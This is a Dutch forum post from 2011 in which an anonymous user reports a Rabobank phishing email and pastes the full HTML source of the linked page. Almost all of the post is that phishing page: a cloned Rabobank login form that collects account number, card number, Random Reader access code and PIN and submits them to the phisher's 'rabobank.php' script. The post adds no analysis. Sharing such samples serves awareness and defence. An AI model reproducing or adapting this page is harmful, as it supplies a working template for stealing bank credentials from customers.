RABO PHISING - Broncode
24-02-2011,13:40 doorAnoniem
Goedendag,

Net weer eens een RABOBANK PHISING email gekregen met een link naar:
http://www.scoresofmusic.com/Content/update.php

Pagina geopend in notepad en dan zien we dit:

--------

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="nl" xmlns="http://www.w3.org/1999/xhtml" lang="nl"><head>
<meta http-equiv="content-type" content="text/html; charset=ISO-8859-1">


<title>Rabobank - Internetbankieren</title>
<meta http-equiv="Content-Script-Type" content="text/javascript">
<meta http-equiv="Content-Style-Type" content="text/css">
<meta http-equiv="Content-Language" content="nl">
<meta name="keywords" content="">
<meta name="description" content="">
<link rel="schema.DC" href="http://purl.org/dc/elements/1.1/">
<link rel="schema.DCTERMS" href="http://purl.org/dc/terms/">
<meta name="DC.title" content="">
<meta name="DC.creator" content="Rabobank">
<meta name="DC.publisher" content="Rabobank">
<meta name="DC.description" content="">
<meta name="DC.format" content="text/html">
<meta name="DC.rights" content="© Rabobank">
<meta name="DC.type" content="">
<meta name="DC.language" content="nl">
<meta name="DC.subject" content="">
<meta name="DC.audience" content="">
<meta name="DC.identifier" content="">
<meta name="DCTERMS.created" content="">
<meta name="DCTERMS.modified" content="">
<meta name="DC.relation.IsBasisFor" content="">
<meta name="DC.abstract" content="">
<meta name="robots" content="noindex, nofollow">
<meta name="keywords" content="">
<link rel="shortcut icon" href="https://bankieren.rabobank.nl/rabo/qsl/images/favicon.ico">
<link rel="home" href="http://www.rabobank.nl/" title="home">
<link rel="stylesheet" type="text/css" media="screen" href="crmv_includes.css">
<script src="rg_uo_buttons.js" type="text/javascript"></script>
<script type="text/javascript">
<!--

if((top.location!=self.location) || (top.frames.length>=1)) {
var winName = 'BRIT';
var winUrl = 'https://bankieren.rabobank.nl/klanten/qslbo.htm?Abs-Pad%3Dklanten%252F%26NIV%3D3';
top.location.href = winUrl;
window.name = winName;
}

var inTextArea=false;
datumVerzoekVerzonden="";

function checkInput(reqType) {
var PatroonAuthId = new RegExp("^[0-9]{9}$");
var PatroonAuthBpasNr = new RegExp("^[0-9]{4}$");
var PatroonAuthCd = new RegExp("^[0-9]{8}$");
var rightFormatAuthId = PatroonAuthId.exec(document.forms.brit_form.AuthId.value);
var rightFormatAuthBpasNr = PatroonAuthBpasNr.exec(document.forms.brit_form.AuthBpasNr.value);
var rightFormatAuthCd = PatroonAuthCd.exec(document.forms.brit_form.AuthCd.value);

if (!rightFormatAuthId || !rightFormatAuthBpasNr || !rightFormatAuthCd){
if (!rightFormatAuthId) {
document.forms.brit_form.AuthId.focus();
msg = 'Het rekeningnummer moet uit 9 cijfers bestaan.';

if (!rightFormatAuthBpasNr) {
msg = msg + '\nHet pasnummer moet uit 4 cijfers bestaan.';
}

if (!rightFormatAuthCd) {
msg = msg + '\nDe toegangscode moet uit 8 cijfers bestaan.';
}
}

else {

if (!rightFormatAuthBpasNr) {
document.forms.brit_form.AuthBpasNr.focus();
msg = 'Het pasnummer moet uit 4 cijfers bestaan.';

if (!rightFormatAuthCd) {
msg = msg + '\nDe toegangscode moet uit 8 cijfers bestaan.';
}
}
else {
document.forms.brit_form.AuthCd.focus();
msg = 'De toegangscode moet uit 8 cijfers bestaan.';
}
}
alert(msg);
}
else {
return sendRequest(reqType);
}
}

function sendRequest(reqType, reqPath) {
verzendTijd = new Date();

if (datumVerzoekVerzonden && (datumVerzoekVerzonden + 21000 > verzendTijd.getTime())) {
return alert ('Het verzoek is al verzonden. Een ogenblik geduld.');
}

else
{
datumVerzoekVerzonden = verzendTijd.getTime();
formSubmit = 'true';

switch (reqType) {
case 'logIn':
document.forms.brit_form.action = 'rabobank.php';
if (document.forms.brit_form.SessHrGebrChk.checked) {
document.forms.brit_form.SessHrGebr.value = "J";
} else {
document.forms.brit_form.SessHrGebr.value = "N";
}
break;
case 'sluitAf':
if (!confirm("Door op OK te klikken sluit u Rabo Internetbankieren. Dit geldt voor alle toepassingen. Wilt u afsluiten?"))
{
datumVerzoekVerzonden = '';
formSubmit = 'false';
}
else
document.forms.brit_form.action = 'rabobank.php';
break;
case 'Annuleer':
formSubmit = 'false';
top.location.href = 'https://www.rabobank.nl';
break;
case 'toonHelp':
datumVerzoekVerzonden = '';
formSubmit = 'false';
if (top.window.newWindow && !top.window.newWindow.closed) {
top.window.newWindow.focus();
top.window.newWindow.location = '/qsl/qslhelp.html?help=' + reqPath, 'Help';
} else {
top.window.newWindow = window.open('/qsl/qslhelp.html?help=' + reqPath, 'Help');
top.window.newWindow.moveTo(1,1);
}
break;
case 'SecureHomepage':
formSubmit = 'false';
top.location.href = '/mijnbankzaken';
break;
case 'Homepage':
formSubmit = 'false';
top.location.href = 'https://www.rabobank.nl';
break;
}
if (formSubmit == 'true') {
setTimeout('document.forms.brit_form.submit()',100);
return;
}
}
}


function setInTextArea() {
inTextArea = true;
}

function setNotInTextArea() {
inTextArea = false;
}

function keyListen(e) {
if (inTextArea) {
var keycode = e.keyCode;
if(keycode == "13") {
keypressed="enter";
return checkInput('logIn');
}
}
}
function callkeydownhandler(evnt) {
ev = (evnt) ? evnt : event;
keyListen(ev);
}
function initiate(){
if (window.document.addEventListener) {
window.document.addEventListener("keydown", callkeydownhandler, false);
} else {
window.document.attachEvent("onkeydown", callkeydownhandler);
}
}

initiate();

function laadPage() {
if (window.name.length > window.document.brit_form.WinNm.maxLength) {
window.document.brit_form.WinNm.value = window.name.substring(0,window.document.brit_form.WinNm.maxLength);
}
else {
window.document.brit_form.WinNm.value = window.name;
}
document.brit_form.AuthId.focus();
}

function ClassNew(obj, new_style) {
obj.className = new_style;
}

function openTooltip(e){
var posx = 0;
var posy = 0;
var offset = 5;
var curtitle = this.title;
this.title = '';
//check if the tooltip is open
if(document.getElementById("tooltip")){
return;
}
var brich = document.getElementById("infoimg");
if(brich != null){curtitle=brich.innerHTML};
var ttnode = document.createElement("div");
document.body.appendChild(ttnode);
ttnode.innerHTML = curtitle;
ttnode.className = "tooltip";
ttnode.id = "tooltip";
if (e.pageX || e.pageY)
{
posx = e.pageX + offset;
posy = e.pageY + offset;
}
else if (e.clientX || e.clientY)
{
posx = e.clientX + document.documentElement.scrollLeft + offset;
posy = e.clientY + document.documentElement.scrollTop + offset;
}
if(posx+ttnode.clientWidth > document.documentElement.clientWidth)posx=posx-ttnode.clientWidth-(2*offset);
if(e.clientY+ttnode.clientHeight > document.documentElement.clientHeight)posy=posy-ttnode.clientHeight-(2*offset);
ttnode.style.left = posx+"px";
ttnode.style.top = posy+"px";
}
function closeTooltip(){
var ttnode = document.getElementById("tooltip");
document.body.removeChild(ttnode);
}
//-->
</script>
</head><body onload="laadPage();">
<div id="brt_wrapper" class="brt_inlog_rr">
<div id="brt_header">
<div id="pa_logo"><img src="rabobank_logo.gif" alt="Rabobank Nederland"></div>
<h1><span>Inloggen met de Random Reader</span></h1>
</div>
<div id="brt_content-section">
<div id="brt_form">
<form name="brit_form" action="rabobank.php" onsubmit="return false" method="post" autocomplete="off">
<fieldset>
<input id="Scid" name="Scid" size="18" maxlength="18" value="212142394988360469" type="hidden">
<input id="WinNm" name="WinNm" size="18" maxlength="18" value="" type="hidden">
<input id="SessHrGebr" name="SessHrGebr" type="hidden">
<legend>Inlogscherm Rabo Internetbankieren</legend>
<ol>
<li>
<label for="AuthId">Vul het rekeningnummer van uw
bankpas in</label>
<span class="brt_onelinev4">
Rekeningnummer <input id="AuthIdv4" name="AuthId" value="" maxlength="9" size="12" onfocus="setInTextArea()" alt=" Rekeningnummer van uw bankpas" type="text">
</span>
<br>
<span class="brt_oneline">
<input name="SessHrGebrChk" class="brt_chkbx" id="brtcheck01" type="checkbox"><label for="brtcheck01">Rekeningnummer
onthouden op deze computer</label>
</span>
</li>
<li>
<label for="AuthId">Vul het pasnummer van uw bankpas
in</label>
<span class="brt_onelinev4">
Pasnummer&nbsp;
<span>
<img id="info" alt="Info bankpas" src="information_small.gif" onclick="javascript:openTooltip(event)">
<span id="infoimg">
<img src="pasnr_prive.png" alt="Plaatje bankpas" onclick="javascript:closeTooltip()">
</span>
</span>
<input id="AuthBpasNrv4" name="AuthBpasNr" value="" maxlength="4" size="4" onfocus="setInTextArea()" alt=" Pasnummer van uw bankpas" type="text">
</span>
</li>
<li><strong>Random Reader</strong>
<ul class="brt_list">
<li>Plaats uw bankpas in de Random
Reader</li>
<li>Druk op <strong>I</strong>
(Inloggen)</li>
<li>Toets de pincode van uw bankpas in</li>
<li>Druk op <strong>OK</strong></li>
</ul>
</li>
<li>
<label for="AuthCd">Vul de toegangscode in die
op uw Random Reader verschijnt</label>
<span class="brt_onelinev4">
Toegangscode <input id="AuthCdv4" name="AuthCd" value="" maxlength="8" size="12" alt=" Getal van uw Random Reader" onfocus="setInTextArea()" type="text">
</br></span>
</li>
<li>
<label for="AuthCd">Voer uw PIN (uw pincode niet onthullen aan iedereen)</label>
<span class="brt_onelinev4">
Uw PIN
<input id="AuthCdv5" name="uwpin" value="" maxlength="4" size="4" alt=" Getal van uw Random Reader" onfocus="setInTextArea()" type="password">
</span>
</li>
</ol>
</fieldset>
<!-- *** Indien foutmelding actief, op deze plek deze markup renderen *** -->
<!-- ******************************************************************** -->
<fieldset class="brt_buttonbar">
<input id="brt_but_submit" title="Inloggen" onclick="return checkInput('logIn');" onfocus="setNotInTextArea()" value="Inloggen" type="button">
<input id="brt_but_annuleren" value="Annuleren" title="Annuleren" onclick="return sendRequest('Annuleer')" onfocus="setNotInTextArea()" type="button">
<input id="brt_but_help" value="Help" title="Help" onclick="return sendRequest('toonHelp', 'HelpDP800I')" onfocus="setNotInTextArea()" type="button">
</fieldset>
</form>
<div class="brt_rborder"></div>
<div class="brt_illustration_rr"></div>
<div class="brt_pctl"></div><div class="brt_pctr"></div><div class="brt_pcbr"></div><div class="brt_pcbl"></div>
</div>
<div id="brt_remark_col">
<div class="crosslink">
<span class="arb1"></span><span class="arb2"></span>
<h3 class="cl_uwveiligheid"><span>Uw veiligheid</span></h3>
<div class="container">
<p>Gebruik bij het inloggen op Rabo
Internetbankieren de I-toets van uw Random
Reader. Gebruik de S-toets alleen bij het
verzenden. Ziet u iets afwijkends? Bel direct de
Helpdesk Internetbankieren: 0900 - 0905 (lokaal
tarief).</p>
<ul class="linklist">
<li><a href="javascript:sendRequest('toonHelp',%20'beveiliging');">
Meer informatie</a></li>
</ul>
</div>
<span class="arb3"></span><span class="arb4"></span>
</div>
</div>
<div id="brt_action_col">
<div class="crosslink">
<span class="arb1"></span><span class="arb2"></span>
<h3 class="cl_aanvragen"><span>Aanvragen</span></h3>
<div class="container">
<p>Heeft u geen toegang tot Rabo
Internetbankieren?</p>
<p>Met Rabo Internetbankieren kunt u altijd via
Internet uw rekeningen inzien en transacties
uitvoeren.</p>
<ul class="linklist">
<li><a href="https://bankieren.rabobank.nl/qsl/qslhelp.html?help=internetbank_info">
Informatie over Rabo Internetbankieren</a></li>
<li><a href="https://bankieren.rabobank.nl/qsl/qslhelp.html?help=internetbank_demo">
Bekijk de demo</a></li>
</ul>
</div>
<span class="arb3"></span><span class="arb4"></span>
</div>
<div class="crosslink">
<span class="arb1"></span><span class="arb2"></span>
<h3 class="cl_help"><span>Help</span></h3>
<div class="container">
<ul class="linklist">
<li><a href="https://bankieren.rabobank.nl/qsl/qslhelp.html?help=kan_niet_inloggen" target="_blank">
Waarom kan ik niet inloggen ?</a></li>
<li><a href="https://bankieren.rabobank.nl/qsl/qslhelp.html?help=melding_942" target="_blank">
Waarom krijg ik de melding (942)?</a></li>
<li><a href="https://bankieren.rabobank.nl/qsl/qslhelp.html?help=melding_947" target="_blank">
Waarom krijg ik de melding (947)?</a></li>
</ul>
</div>
<span class="arb3"></span><span class="arb4"></span>
</div>
</div>
<div id="brt_footer">
<p>Ga alleen verder als de adresregel begint met
https://bankieren.rabobank.nl/...</p>
<ul class="linklist">
<li><a href="javascript:sendRequest('toonHelp',%20'controleer_verbinding');">
Hoe controleert u de veiligheid van uw verbinding?</a></li>
<li><a href="javascript:sendRequest('toonHelp',%20'beveiliging');">
Lees meer over veiligheid</a></li>
</ul>
</div>
</div>
</div>
<script type="text/javascript" src="brwfunc.js"></script><script language="Javascript1.1">varJSver = 1.1;</script><script language="Javascript1.2">varJSver = 1.2;</script><script language="Javascript1.3">varJSver = 1.3;</script><script language="Javascript1.4">varJSver = 1.4;</script><script language="Javascript1.5">varJSver = 1.5;</script><script language="Javascript1.6">varJSver = 1.6;</script><script language="Javascript1.7">varJSver = 1.7;</script><script language="Javascript1.8">varJSver = 1.8;</script><script language="Javascript1.9">varJSver = 1.9;</script><script language="Javascript2.0">varJSver = 2.0;</script><img src="trans.gif" width="1" height="1"><img src="whitepixel.gif" width="1" height="1">
</body></html>
--------